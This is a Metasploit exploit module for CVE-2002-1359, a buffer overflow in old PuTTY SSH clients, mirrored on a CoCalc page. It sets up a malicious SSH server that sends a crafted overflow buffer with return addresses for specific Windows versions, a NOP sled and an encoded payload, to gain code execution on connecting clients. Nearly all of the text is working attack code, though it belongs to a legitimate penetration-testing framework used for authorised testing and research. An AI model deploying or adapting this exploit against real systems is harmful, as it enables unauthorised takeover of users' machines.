Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ssh/putty_msg_debug.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'PuTTY Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in the PuTTY SSH client that is

18
          triggered through a validation error in SSH.c. This vulnerability

19
          affects versions 0.53 and earlier.

20
        },

21
        'Author' => 'MC',

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2002-1359' ],

25
          [ 'OSVDB', '8044'],

26
          [ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ],

27
          [ 'BID', '6407'],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
        },

32
        'Payload' => {

33
          'Space' => 400,

34
          'BadChars' => "\x00",

35
          'MaxNops' => 0,

36
          'StackAdjustment' => -3500,

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],

41
          [ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ],

42
          [ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],

43
        ],

44
        'Privileged' => false,

45
        'DisclosureDate' => '2002-12-16',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])

58
      ]

59
    )

60
  end

61


62
  def on_client_connect(client)

63
    return if ((p = regenerate_payload(client)) == nil)

64


65
    buffer =

66
      "SSH-2.0-OpenSSH_3.6.1p2\r\n" +

67
      "\x00\x00\x4e\xec\x01\x14" +

68
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

69
      "\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" +

70
      (((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 2) +

71
      (((rand_text_alphanumeric(64)) + ",") * 2) + rand_text_alphanumeric(21) +

72
      [target.ret].pack('V') + make_nops(10) + p.encoded +

73
      (((rand_text_alphanumeric(64)) + ",") * 15) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +

74
      (((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +

75
      (((rand_text_alphanumeric(64)) + ",") * 21) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +

76
      (((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 6) +

77
      "\x00\x00\x00\x00\x00\x00"

78


79
    print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

80


81
    client.put(buffer)

82
    handler

83


84
    service.close_client(client)

85
  end

86
end

87


88